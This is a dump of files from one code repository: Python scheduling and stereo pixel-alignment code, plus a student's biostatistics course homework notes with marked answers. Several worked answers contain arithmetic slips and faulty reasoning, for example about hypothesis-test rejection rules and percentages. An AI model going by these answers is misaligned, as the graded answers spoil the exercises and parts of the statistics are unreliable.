prev_tasks(self, a):\r\n\t\t\"\"\"the tasks that immediately precede a\"\"\"\r\n\t\tresult = set()\r\n\t\tfor t in self.tasks:\r\n\t\t\tif t != a and a in self.next_tasks(t):\r\n\t\t\t\tresult.add(t)\r\n\t\treturn result\r\n\r\n\tdef es(self, b):\r\n\t\t\"\"\"The earliest start time for task b\"\"\"\r\n\t\tif b == self.start:\r\n\t\t\treturn 0\r\n\r\n\t\treturn max([ (self.es(a) + self.duration(a)) \r\n\t\t\tfor a in self.prev_tasks(b) ])\r\n\r\n\tdef ls(self, a):\r\n\t\t\"\"\"The latest start time for task a\"\"\"\r\n\t\tif a == self.finish:\r\n\t\t\treturn self.es(a)\r\n\r\n\t\treturn min([ (self.ls(b)-self.duration(a)) \r\n\t\t\tfor b in self.next_tasks(a) ])\r\n\r\n\tdef schedule(self):\r\n\t\t\"\"\"A schedule for this task network\"\"\"\r\n\t\tsched = []\r\n\t\tfor t in self.tasks:\r\n\t\t\tsched.append( (t, self.es(t), self.ls(t) ) )\r\n\t\treturn sched\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n\r\n\r\n" }, { "alpha_fraction": 0.7290186882019043, "alphanum_fraction": 0.7458563446998596, "avg_line_length": 50.32432556152344, "blob_id": "4e5ee9284c7a263eff387e7d8238de6fc2114ba1", "content_id": "8ce7c7deb1f67d73f36b39a6d79ef33a472ae7a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 605, "num_lines": 74, "path": "/PH207x/homework/ten/Simple Linear Regression.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Simple Linear Regression #\n We use data from the Environmental Protection Agency (EPA) to track the BP oil spill in Louisiana between May and September 2010. The oil well exploded on April 20, 2010, was capped in July and was declared dead in September 2010. The oil spill killed wildlife in the Gulf of Mexico and posed a significant public health risk to clean-up workers and residents of the Gulf Coast (Solomon and Janssen 2010). The EPA monitored air quality and took samples of sediment to measure the impact of the oil spill. For more information from the EPA, visit http://www.epa.gov/bpspill/sediment.html#understanding. \n \nUse the dataset oilspill.dta to answer the following questions. \n \nSimple Linear Regression. In this example, we track changes in the amount of nickel found in sediment along the Louisiana coast between May and September 2010 (note that there is no data from July). Nickel is a metal that is found in sediment contaminated with oil. We model the amount of nickel as a function of time (month) using linear regression. \n \nFit a linear regression model with nickel as the outcome and month as the explanatory variable. Using indicator variables, model month as a categorical covariate (i.e. for the variable \"month\", it is coded numerically as May = 5, June = 6, August = 8, September = 9). Call this Model 1. \n \nAssume the assumptions of linear regression are met for this model. You can make histograms of nickel by month to visually verify that the data does not appear to be skewed or any other evidence that would suggest a violation of the assumptions necessary to analyze this data using linear regression. \n \n**TODO:**\n* Fit a linear regression model with nickel as the outcome and month as the explanatory variable. \n* model month as a categorical covariate\n\n```stata\n\thistogram nickel, by(month)\n\txi: regress nickel i.month\n\n\tpredict r, residuals\n\tqnorm r\n\tswilk r\n\testat hettest\n```\n\n##### 1. Does the amount of nickel in the soil tend to increase over the four month period? #####\n* Yes\n* No\n\n##### 2. Examine the regression coefficients. Compare how the average nickel amount changes by month. Is it reasonable to assume that average amount of nickel increases linearly by month? #####\n* Yes\n* No\n\n##### 3. Make a residual plot. #####\n\n1. Is there any evidence of outliers? \n\t* Yes\n\t* No\n\n2. Is there any evidence of heteroscedasticity?\n\t* Yes\n\t* No\n\n##### 4. Using Model 2, it is estimated that, on average, nickel increases by ______ each month, from May to September.. #####\nNow, assume the amount of nickel increases linearly by month, and the assumptions of linear regression continue to hold. Fit a model with nickel as the outcome and month modeled as a continuous explanatory variable. Call this Model 2. \n> **Hint1:** Read the interpretation of q4 given in Tutorial: Simple Linear Regression pdf . the ans is in the sme table \n\n```stata\n\thistogram nickel, by(month)\n\txi: regress nickel i.month\n\tregress nickel month\n```\n\n\n##### 5. What is the 95% confidence interval for the average increase in nickel each month? #####\nLower Bound \nUpper Bound \n\n##### 6. Given that the relationship between month and nickel appears to be linear, is it reasonable to use Model 2 to predict the amount of nickel in the soil in July 2010? #####\n* Yes\n* No\n\n##### 7. Given that the relationship between month and nickel appears to be linear, is it reasonable to use Model 2 to predict the amount of nickel in the soil in October 2010? #####\n* Yes\n* No\n\n##### 8. What is the average amount of nickel in the soil during August 2010? #####\n\n1. According to model 1 (Hint: Think about how dummy/indicator variables are coded.)\n2. According to model 2\n\n##### 9. True or False: Model 1 makes stronger modeling assumptions than Model 2. #####\n* Yes\n* No\n\n\n\n" }, { "alpha_fraction": 0.7713620066642761, "alphanum_fraction": 0.7819782495498657, "avg_line_length": 71.86792755126953, "blob_id": "62379e4b2ce60944b97ff3da1781e0b55920ed87", "content_id": "60b768e6a19a72f77d7a5fdc9d29398df1a329ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3866, "license_type": "no_license", "max_line_length": 594, "num_lines": 53, "path": "/PH207x/homework/eight/Other Aspects of Survey Design.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Other Aspects of Survey Design #\n> Thus far, we have examined sampling design, which is only one element of designing a survey. Building and testing the survey instrument/questionnaire, anticipating and preparing for non-response, and training field teams to conduct the survey are several other critical aspects that we have not even touched on! \n> \n> Use the Boston physical health survey example from the previous question to answer the following: \n\n### 1. When designing your survey, you are trying to decide whether to use a 2-page questionnaire with 15 simple questions about whether an individual exercises, how many times per week, and whether they have a history of diabetes, along with some other very basic demographics (call this Survey 1). Your colleague says you could get much better information if you used a 10 page questionnaire with a more complete medical history and history of exercise and physical activity (call this Survey 2).###\n> Krosnick (1991) discusses “satisficing” (satisfy + suffice) in surveys. To paraphrase this discussion, satisficing occurs when, rather than optimizing their responses to best reflect reality, survey respondents try to reduce the cognitive burden associated with the survey and consequently may select a survey response haphazardly or even arbitrarily.\n\n\n> **Survey 1**\n* 15 simple questions about whether an individual exercises, \n* how many times per week\n* whether they have a history of diabetes, along with some other very basic demographics\n\n> **Survey 2**\n* 10 page questionnaire with a more complete medical history \n* history of exercise \n* physical activity\n\n\n\n#### Which survey would be more susceptible to satisficing? ####\n\n* Survey 1 \n* Survey 2 \n\n> *Source: Krosnick, J. (1991). Response Strategies for Coping with the Cognitive Demands of Attitude Measures in Surveys. Applied Cognitive Psychology, 5: 236.*\n\n\n\n### 2.You decide to implement a door-to-door survey, where you randomly sample addresses within a neighborhood and train a field team to ask the survey questions at the selected households. (You have a complete listing of addresses in Boston). ### \n> Your colleague says you should obtain a listing of all land-line telephone numbers in Boston (a listing of cell phone numbers is not available) and randomly sample numbers from this list and ask the questions over the phone. For sake of argument, assume that you get a 100% response rate for both modes (door to door and phone calls), and that you construct survey weights using the table above. \n\n#### Would you expect the door-to-door or land-line method to produce unbiased results? (Think about which sampling frame is likely to be more complete.) ####\n\n* door-to-door \n* landline \n\n\n#### Would you expect the door-to-door or land-line method to be cheaper to implement? ####\n\n* door-to-door\n* landline \n\n> *Note: web-based surveys are also common. In order to minimize non-response, some surveys use multiple modes of response and follow-up (e.g. web + phone; or web + household follow-up).*\n\n\n### 3. Individuals can opt out of any part of your survey. High BMI and low physical activity are risk factors for diabetes, and you find that individuals with these characteristics are less likely to answer questions about history of diabetes (note that high BMI and low physical activity are risk factors for diabetes). In a complete case analysis, missing data is dropped, survey weights are recalculated, and data is analyzed assuming missing observations were never collected. In a complete case analysis, would you expect to obtain unbiased estimates of diabetes prevalence in Boston? ###\n\n* No \n* Yes\n\n> *Source: Boston Redevelopment Authority Research Division (2011). Boston 2010 Census Population: Planning District Comparison: http://www.bostonredevelopmentauthority.org/PDF/ResearchPublications//PDPercentChange.pdf*\n" }, { "alpha_fraction": 0.771484375, "alphanum_fraction": 0.771484375, "avg_line_length": 83.83333587646484, "blob_id": "cd7bbafad31bbc5178a16e30a2fb28c915c144b3", "content_id": "370d2443c6f5920f5a87ce9a580ae32bb52f5a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 512, "license_type": "no_license", "max_line_length": 253, "num_lines": 6, "path": "/PH207x/homework/nine/Confounding Multiple Choice.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Confounding Multiple Choice ##\n> Select the best answer: In the presence of confounding,\n* The crude (unadjusted) results are not correct if the sample size is small. \n* The exposed and unexposed are exchangeable. \n* => **The results are not correct because there is a third factor associated with exposure and outcome that at least partially explains the results. (In other words: the results obtained directly are not correct, that's why they need to be adjusted )**\n* Stratification is not appropriate. \n\n\n" }, { "alpha_fraction": 0.520205557346344, "alphanum_fraction": 0.5466012358665466, "avg_line_length": 23.470237731933594, "blob_id": "049e43997f6105b2ffe3442c89d4174087007ba3", "content_id": "0885ed1ccc56ea59666ae256e2c7ad859e842828", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4281, "license_type": "no_license", "max_line_length": 305, "num_lines": 168, "path": "/AI-Class/Algorithms-Python/PixelAlignment.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"Attempt to implement pixel correspondence from scan lines\r\nas described in Unit 17-26.\r\n\"\"\"\r\n\r\n# Convenience constants for making examples\r\nblack = 'B'\r\nblue = 'U'\r\nred = 'R'\r\nb = black\r\nr = red\r\n\r\ndef align(left, right, \\\r\n\t\tbad_match_cost, occlusion_cost, good_match_cost=0):\r\n\t\"\"\" Print the pixel correspondence \r\n\t\tbetween left and right camera scan lines\r\n\t\t(that is, align the scan lines)\r\n\r\n\tQuiz from Unit 17-16 (note: there are multiple correct answers for \r\n\tthis as explained in the aiqus forums):\r\n\t>>> left = [b,b,r,r,r,b]\r\n\t>>> right = [b,r,r,r,r,b]\r\n\t>>> a = align(left, right, 20, 5)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 \r\n\tB B R R R B \r\n\t| / / / | \r\n\tB R R R R B \r\n\tcost=10\r\n\r\n\tUnit 17-17 (this works):\r\n\t>>> left = [b,r,b,b,b,b]\r\n\t>>> right = [b,b,b,b,r,b]\r\n\t>>> a = align(left, right, bad_match_cost=20, occlusion_cost=10)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 \r\n\tB R B B B B \r\n\t| / / / | \r\n\tB B B B R B \r\n\tcost=20\r\n\r\n\tOther examples (just made up):\r\n\t>>> left = [b,b,b,b,b,r,r]\r\n\t>>> right = [r,r,b,b,b,b,r]\r\n\t>>> a = align(left, right, 20, 10)\r\n\t>>> a\r\n\t((40, [('bad_match', (0, 0), 20), ('right_occl', (0, 1), 30), ('good_match', (1, 2), 30), ('good_match', (2, 3), 30), ('good_match', (3, 4), 30), ('good_match', (4, 5), 30), ('good_match', (5, 6), 30), ('left_occl', (6, 6), 40)]), ['B', 'B', 'B', 'B', 'B', 'R', 'R'], ['R', 'R', 'B', 'B', 'B', 'B', 'R'])\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 7 \r\n\tB B B B B R R \r\n\t| \\ \\ \\ \\ \\ \r\n\tR R B B B B R \r\n\tcost=40\r\n\r\n\t>>> left = [b,b,blue,r,r,r,b,b]\r\n\t>>> right = [b,b,r,r,r,blue,b,b]\r\n\t>>> a = align(left, right, 20, 10)\r\n\t>>> print_align(a)\r\n\t1 2 3 4 5 6 7 8 \r\n\tB B U R R R B B \r\n\t| | / / / | | \r\n\tB B R R R U B B \r\n\tcost=20\r\n\t\"\"\"\r\n\tdef match(i, j):\r\n\t\tif left[i] == right[j]:\r\n\t\t\treturn good_match_cost, 'good_match'\r\n\t\treturn bad_match_cost, 'bad_match'\r\n\r\n\tdef ismatch(action):\r\n\t\treturn action == 'good_match' or action == 'bad_match'\r\n\r\n\tdef best_tuple(value_path_action_tuples):\r\n\t\tbest_tuple = None\r\n\t\tfor t in value_path_action_tuples:\r\n\t\t\tval, path, action = t\r\n\t\t\tif best_tuple is None:\r\n\t\t\t\tbest_tuple = t\r\n\t\t\telse:\r\n\t\t\t\tbest_val, best_path, best_action = best_tuple\r\n\t\t\t\tif val < best_val:\r\n\t\t\t\t\tbest_tuple = t\r\n\t\t\t\telif val == best_val:\r\n\t\t\t\t\tpath_action, path_coords, path_val = path[0]\r\n\t\t\t\t\tif ismatch(path_action):\r\n\t\t\t\t\t\tbest_tuple = t\r\n\t\treturn best_tuple\r\n\r\n\tcache = dict()\r\n\r\n\tdef value(i, j):\r\n\t\tif (i, j) in cache:\r\n\t\t\treturn cache[(i, j)]\r\n\r\n\t\ttuples = []\r\n\t\tif i >= 0 and j >= 0:\r\n\t\t\tmatch_val, match_path = value(i-1, j-1)\r\n\t\t\tmatch_cost = match(i, j)\r\n\t\t\tmatch_val += match_cost[0]\r\n\t\t\ttuples.append( (match_val, match_path, match_cost[1]) )\r\n\t\tif i >= 0:\r\n\t\t\thoriz_occl_val, horiz_occl_path = value(i-1, j)\r\n\t\t\thoriz_occl_val += occlusion_cost\r\n\t\t\ttuples.append( (horiz_occl_val, horiz_occl_path,'left_occl') )\r\n\t\tif j >= 0:\r\n\t\t\tvert_occl_val, vert_occl_path = value(i, j-1)\r\n\t\t\tvert_occl_val += occlusion_cost\r\n\t\t\ttuples.append( (vert_occl_val, vert_occl_path, 'right_occl') )\r\n\r\n\t\tif tuples:\r\n\t\t\tbest_val, best_path, best_action = best_tuple(tuples)\r\n\t\t\tmy_path = list(best_path)\r\n\r\n\t\t\t# mlake sure to append our best to the existing path\r\n\t\t\tmy_path.append( (best_action, (i, j), best_val) )\r\n\t\t\tresult = best_val, my_path\r\n\t\telse:\r\n\t\t\tresult = 0, []\r\n\r\n\t\tcache[(i, j)] = result\r\n\t\treturn result\r\n\r\n\tn = len(left)-1\r\n\r\n\treturn value(n, n), left, right\r\n\r\ndef print_align(alignment):\r\n\t\"\"\"\r\n\tPretty-prints the results of the align() function.\r\n\r\n\tEx.\r\n\tB B U R R R B B\r\n | | / / / | |\r\n\tB B R R R U B B\r\n\t\"\"\"\r\n\tcost, path = alignment[0]\r\n\tleft, right = alignment[1:]\r\n\tn = len(left)\r\n\r\n\tresult = []\r\n\tfor i in xrange(n):\r\n\t\tresult.append( '%d ' % (i+1) )\r\n\tresult.append('\\n')\r\n\tfor p in left:\r\n\t\tresult.append( '%s ' % p )\r\n\tresult.append('\\n')\r\n\tfor action, coord, cost in path:\r\n\t\tif action == 'right_occl' or action == 'left_occl':\r\n\t\t\tresult.append( ' ' )\r\n\t\telif action == 'good_match' or action == 'bad_match':\r\n\t\t\ti, j = coord\r\n\t\t\tif i == j:\r\n\t\t\t\tresult.append('| ')\r\n\t\t\telif i > j:\r\n\t\t\t\tresult.append('/ ')\r\n\t\t\telse:\r\n\t\t\t\tresult.append('\\\\ ')\r\n\tresult.append('\\n')\r\n\r\n\tfor p in right:\r\n\t\tresult.append( '%s ' % p )\r\n\tresult.append('\\n')\r\n\tresult.append('cost=%d' % cost)\r\n\t\r\n\tprint ''.join(result)\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n\r\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6657754182815552, "avg_line_length": 35.978023529052734, "blob_id": "1ebd110c4f4b2889171bf93fc1a9e372ed921cf3", "content_id": "f2807c123f7525df11aa7d475b326b7c1209184b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3436, "license_type": "no_license", "max_line_length": 291, "num_lines": 91, "path": "/PH207x/homework/six/Hypothesis Testing with known Variance.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Hypothesis Testing with known Variance#\nNow, let's switch gears and assume that we didn't know the true population mean μ, and we only observed a sample of 25 school children in Delhi. Let's use the sample mean from this set of children to make inference about the true population mean μ.\n\nFor this question, assume that σ=12.5 is known and that the sample size of 25 is large enough to use the Central Limit Theorem. So, for this question, we will base our inferences off of the normal distribution, not the t-distribution).\n\nIn this scenario, we can conduct a one-sample Z-test for inference about μ in a population with known variance σ2. To test H0:μ=μ0, we can use the test statistic: Z^∗= (xˉ−μ_0) / (σ/sqrt(n) )\n\nUnder the null hypothesis, Z∗∼N(0,1). So, we can use the standard normal distribution to calculate a p-value for this hypothesis test:\n\n* For the one-sided test with alternative hypothesis Ha:μ>μ0, we can calculate a p-value using the formula p=P(Z>Z∗).\n* For the one-sided test with alternative hypothesis Ha:μ≤μ0, we can calculate a p-value using the formula p=P(Z≤Z∗).\n* For the two-sided test with alternative hypothesis Ha:μ≠μ0, we can calculate a p-value using the formula p=2∗P(Z≤−|Z∗|).\n\nNote: there is no command for directly conducting this one-sample Z-test in Stata. However, you can use the normal function in Stata to calculate the p-values. \n\n> μ= population mean= ? \n> n= sample size= 25 \n> σ= 12.5\n> p-value= ?\n\n\n> We can use the Central Limit Theorem \n> We will use the *normal distribution*\n> Use one-sample Z-test with known variance\n\n1. In a sample of size 25, what is the value of the test statistic testing whether the mean hemoglobin level is equal to 108 g/L versus the alternative that it is not equal to 108 g/L, when xˉ=103. Use a one-sample Z-test. What is the p-value corresponding to this two-sided hypothesis test?\n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ != 108 | \n\n> μ_0= 108 mg/ml \n> σ= 12.5\n> n= 25\n> xˉ= mean hemoglobin levels= 103\n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\n> => **-2 is less than 1.96** \n> => So we reject the null hypothesis\n\nTest statistic \n> => **-2**\n\np-value \n> 2*normal( -2 )\n> => **0.04550026**\n> => \n\n2. In a sample of size 25, what is the value of the test statistic for testing whether the mean hemoglobin level in the population is equal to 108 g/L versus the alternative that it **is less** than 108 g/L, when xˉ=103. What is the p-value corresponding to this one-sided test? \n\n> n= 25\n> μ_0= 108 mg/ml \n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ < 108 | \n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\n> => **-2 is less than 1.96** \n> => So we reject the null hypothesis\n\nTest statistic \n> => **-2**\n\np-value \n> normal( -2 )\n> => **0.02275013**\n\n\n3. In a sample of size 25, what is the value of the test statistic for testing whether the mean hemoglobin level in the population is equal to 108 g/L versus the alternative that it **is greater** than 108 g/L, when xˉ=103. What is the p-value corresponding to this one-sided test? \n\n> n= 25\n> μ_0= 108 mg/ml \n\nHypotheses | \n-------------- | \nH_0: μ = 108 | \nH_A: μ > 108 | \n\n> z*= (x⁻ - μ_0) / (σ/SQRT(n))= (103 - 108) / (12.5/sqrt(25))= -2\n\nTest statistic \n> => **-2**\n\np-value p=P(Z>Z*)\n> normal( 2 )\n> => **0.97724987**\n\n" }, { "alpha_fraction": 0.4455571174621582, "alphanum_fraction": 0.5776397585868835, "avg_line_length": 40.95212936401367, "blob_id": "f90614579a1051a02651c934058d6b1bb985251b", "content_id": "11cae9db5b7e44224f5c3fbd607f3b0c5e27d057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7889, "license_type": "no_license", "max_line_length": 217, "num_lines": 188, "path": "/PH207x/excercises/Lesson4/Measures of Association/Binary Exposure and Binary Outcome.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Binary Exposure and Binary Outcome\n| Exposure | Outcome + | Outcome - | Total | Estimated Risk\n-----------------------------------------------------------\n| E+ | A | B | N_1 | A/N_1\n| E- | C | D | N_0 | C/N_0\n\n## Example with Smokers (SMK)\n| Exposure | Outcome + | Outcome - | Total | Estimated Risk\n| | e.g. Death| e.g. Survive| | \n------------------------------------------------------------\n| E+ (SMK) | A | B | N_1 | A/N_1\n| E- (N-SMK)| C | D | N_0 | C/N_0\n\n## Common Measures of Association\nRisk Ratio: RR=R_1/R_0\nRisk Difference (Attributable Risk): RD= R_1-R_0\nDisease Odds Ratio: OR= (R_1/(1-R_1)) / (R_0/(1-R_0))\nOdds= Risk/(1-Risk)\n\n## Example Cumulative Incidence Data\n| | Headache | No Headache | Total | Estimated Risk\n------------------------------------------------------------\n| Male | 10 | 40 | 50 | 10/50= .20\n| Females| 5 | 45 | 50 | 5/50= .10\n\nRisk Ratio: RR= (10/50) / (5/50)= .20/.10= 2.0\nRisk Difference = .20 - .10= .10\n\n## Example Incidence Rate Data\n| | Headache | Person-Days of Follow-up | Incidence Rate\n------------------------------------------------------------\n| Male | 10 | 302 | 10/302pd\n| Females| 5 | 343 | 5/343pd\n\nRisk Ratio: RR= (10/302pd) / (5/343pd)= .20/.10= 2.27\nRisk Difference = (10/302pd) - (5/343pd)= 1.85/100pd\n\n# Odds\n## Example Odds - Cumulative Incidence Data\n| | Headache | No Headache | Total | Disease Odds | Non-Disease Odds\n------------------------------------------------------------\n| Male | 10 | 40 | 50 | 10/40= 0.25 | 40/10=4\n| Females| 5 | 45 | 50 | 5/45= 0.11 | 45/5= 9\n\nOdds Ratio= (10/40) / (5/45) = 2.25\nOdds Ratio_2 for not developing outcome= 1/(Odds Ratio for developing outcome)\nOdds Ratio_2= (40/10)/(45/5)= .4444= 1/2.25\n\n## Illness Odds Ratio= Exposure Odds Ratio\n| | Headache | No Headache | Disease Odds\n------------------------------------------------------------\n| Male | 10 | 40 | 10/40= 0.25\n| Females| 5 | 45 | 5/45= 0.11\n| Exposure Odds | 10/5 | 40/45 | EOR= (12/5) / (40/45)\n\n=> For small risks OR ~ RR\n\n# Measures of Association Problem 1 \n| | Died | Survived | Total | Estimated Risk | Disease Odds\n------------------------------------------------------------\n| Male | 843 | 1101 | 1944 | 843/1944=0.43364198 | 843/1101= 0.765667574932\n| Females| 707 | 1783 | 2490 | 707/2490=0.28393574 | 707/1783= 0.396522714526\n\nQ1.) What is the 24 year Risk Ratio for dying comparing Males (exposed group) to Females (non-exposed group)?\nRisk Ratio: RR= 0.43364198 / 0.28393574= 1.5272539\ndi ( 0.43364198 / 0.28393574 )\n=> \n\nQ2.) What is the 24-year Risk Difference for dying, comparing Males (exposed group) to Females (non-exposed group)?\nRisk Difference = 0.43364198 - 0.28393574= 0.14970624\n\nQ3.) What is the 24-year Odds Ratio for dying, comparing Males (exposed group) to Females (non-exposed group)?\nOdds Ratio= (843/1101) / (707/1783)\ndi ( (843/1101) / (707/1783) )\n=> 1.930955143\n\n\n# Measures of Association Problem 2 \n| | Died | Person-Years of Follow-up | Incidence Rate\n------------------------------------------------------------\n| Male | 843 | 38,287.33 | 842/38,287.33= 0.02199161\n| Females| 707 | 52,828.15 | 707/52,828.15= 0.01338302\n\nRate Ratio: RR= 0.02199161 / 0.01338302= 1.6432472\nRisk Difference = 0.02199161 - 0.01338302= 0.00860859\n\nQ1.) What is the 24-year Rate Ratio for dying, comparing Males (exposed group) to Females (non-exposed group)?\nRate Ratio: RR= 0.02199161 / 0.01338302= 1.6432472\n\nQ2.) What is the 24-year Rate Difference for dying, comparing Males (exposed group) to Females (non-exposed group)? Please express your answer in units of 100 person-years. \nRisk Difference = 100*(0.02199161 - 0.01338302)= 0.00860859*100= 0.860859\n\n# Measures of Association AP%\n## Attributable Proportion Among Exposed Subjects\n\n * Attributable Risk Percent Among Exposed Subjects\n * Attributable Fraction Among Exposed Subjects (Stata) - What they're asking is how much of a person's risk, if a smoker, is due to the fact that they smoke?\n * Proportion of Exposed Subject's Risk that is \"attributed\" to the Exposure\n\n\t\t\t\t\tR_Exposed (total risk)\nR_Exposed-R_Non-Exposed (risk difference)\tR_Non-Exposed (Baseline Risk)\n\nAP%= (RR-1)/RR\n\n## Attributable Proportion Among Total Population\nAP%_Population= p(RR-1)/(1+p(RR-1))\n\n\n## 24-Year Risk of Death Among Smokers and Non-Smokers\n| | Died | Survived | Total | Estimated Risk\n---------------------------------------------------------\n| Smokers | 788 | 1393 | 2181 | 788/2181=0.36 \n| Non-Smokers | 762 | 1491 | 2253 | 762/2253=0.34\n| Total | 1550 | 2884 | 4434 | 1550/4434= 0.35\n\n-> Attributable Proportion Among Exposed Subjects\nRisk Ratio: RR= 0.36 / 0.34= 1.07\nAP%_Exposed= (1.07-1)/1.07= 0.065\n\n-> Attributable Proportion Among Total Population\np= prevelance of exposure in population= P(Smokers)= 2181/4434= 0.49\nAP%_Population= 0.49*(1.07-1) / (1+0.49*(1.07-1))= 0.033\n\nWe come up with an answer of 0.033%. Meaning of the 3% between 3% and 4% of the average risk of dying in the entire population can be attributed to the fact that roughly half the people in the population were smoking.\n\n\n# Measures of Association NNT\n## Example: Rosuvastatin to Prevent Mortality in Subjects with Elevated C-Reactive Protein\n| Treatment | Deaths | Number of Subjects | Estimated Risk\n---------------------------------------------------------\n| Rosuvastatin| 198 | 8901 | 0.0222\n| Placebo | 247 | 8901 | 0.0277\n\nQ1.) Suppose 10000 subjects were treated with Rosuvastatin:\nExpected Number of Deaths= 10000*0.0222= 222\n\nQ2.) Suppose 10000 subjects were treated with Placebo:\nExpected Number of Deaths= 10000*0.0277= 277\n\n=> Implications: 277-222= 55 deaths prevent for every 10000 treated subjects\n=> Death prevented for every 181.8 (10000/55) treated subjects\n\n## Number Needed to Treat (NNT)\nNNT= Number of subjects needed to treat to prevent 1 outcome\n\nExample: 181.8 treated with Rosuvastatin would prevent 1 deaths\n181.8\t= 1/(Risk_Placebo - Risk_Treatment)= 1/(Risk_Difference)\n\t= 1/(0.0277-0.0222)= 1/(55/10000)= 181.8\n\n\n# Measures of Association Reg Coeff \nWhat is probably the most commonly used measure of association to link a risk\nfactor to an outcome.\n\n## 24-Year Risk of Death by Packs of Cigarettes Smoked (FHS)\n| Packs1 | Died | Survived | Total | Estimated Risk\n----------------------------------------------------\n| 0 | 762 | 1491 | 2253 | 762/2253= 0.34\n| 1 ( 1-20) | 573 | 1098 | 1671 | 573/1671= 0.34\n| 2 (21-40) | 169 | 229 | 398 | 169/298= 0.43\n| 3 (>40) | 36 | 44 | 80 | 36/80= .45\n\n### Regression Model Equation:\nRisk= B_0 + B_1(#Packs1)\n\n### Slope (B_1): Estimate of the Effect of Smoking\nB_1= (delta in Risk)/(Smoking 1 additional pack)\n\n## 24-Year Risk of Death by Packs of Cigarettes Smoked (FHS)\n| Packs1 | Died | Survived | Total | Log(Odds) or (Logit)\n----------------------------------------------------\n| 0 | 762 | 1491 | 2253 | Log(762/1491)= -0.67\n| 1 ( 1-20) | 573 | 1098 | 1671 | Log(573/1098)= -0.65\n| 2 (21-40) | 169 | 229 | 398 | Log(169/229)= -0.30\n| 3 (>40) | 36 | 44 | 80 | Log(36/44)= -0.20\n\nLog(Odds)= ln(Odds)= natural log of the Odds of Death\n\n### Regression Model Equation:\nLog(Odds)= B_0 + B_1(#Packs1)\n\n### Slope (B_1): Estimate of the Effect of Smoking\nB_1= (delta in Log(Odds))/(Smoking 1 additional pack)= log( Odds Ratio )\n\n## Implications\n * Regression coefficients = slopes\n * Measures of Association\n * Regression coefficient from logistic regression model is a log(Odds Ratio)\n\n\n" }, { "alpha_fraction": 0.5237127542495728, "alphanum_fraction": 0.6470189690589905, "avg_line_length": 30.70967674255371, "blob_id": "18e12eefda5663c6bbe5015793d31b23ffac35d5", "content_id": "9f5260c15cb22f4862fb891e177f41de0625fedc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2952, "license_type": "no_license", "max_line_length": 272, "num_lines": 93, "path": "/PH207x/homework/four/Lung cancer and the binomial distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Lung cancer and the binomial distribution\n\nRecall: According to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\nLung cancer and the binomial distribution. You also need to carefully consider how many cases of lung cancer you expect to observe in your study over time. We first model the number of lung cancer cases observed in the first year using the binomial distribution.\n\n- 2010: 19.3% of >18 years smoke cigarettes\n- p= 0.193\n- n= 2000 have no lung cancer\n- observation 5 years\n- 2008: incidence rate of lung cancer was 65.1 cases per 100,000 people per year -> = 0.0000655\n\n##### Q1. What proportion of the study population would you expect, on average, to be diagnosed with lung cancer in the first year? #####\n\t \n>\t=> Prevalence Proportion is the total number of persons with lung cancer \n>\n>\tp= prevalence = incidence * duration= 65.1/100000 * 1= 0.000651 \n>\tn= sample size= 2000 \n>\tsd(X)= standard deviation= SQRT( n*p*(1-p) )= SQRT( 2000*65.1/100000*(1-65.1/100000) )= 1.1406806731 \n>\n>\tproportion= prevalence / duration= 65.1/100000 / 1= **0.000651**\n\n* * *\n\n##### Q2. How many cases of lung cancer would we expect to observe in the first year? #####\n*Hint1: The expected value E(x) of a binomial distribution can be with decimals, but the actual number of alive people can only be a whole number (0, 1, 2, 3...).* \n\t \n>\tp= 65.1/100000 \n>\tn= 2000 \n>\tE(x)= n*p= 65.1/100000*2000 \n\n\tdi 65.1/100000*2000 \n\n>\t=> E(x)= **1.302**\n\n* * *\n\n##### Q3. Why would you expect the mean and variance to be similar in this example? #####\n- **the event is rare**\n- the mean is close to 1 \n- we are dealing with incidence rates \n- both (a) and (b)\n\n* * *\n\n##### Q4. What is the probability that you observe more than 1 lung cancer case in the first year? #####\n\n>\tP(X>1)= ?\n\n>\tk=1 \n>\tn=2000 \n>\tp=0.00065 \n\n>\tP(X>1)= P(X>=1)-P(X=1)\n>\tP(X>1)= binomialtail(2000,1,0.00065)-binomialp(2000,1,0.00065)\n\n\tdi binomialtail(2000,1,0.00065)-binomialp(2000,1,0.00065)\n\n>\t=> P(X>1)= 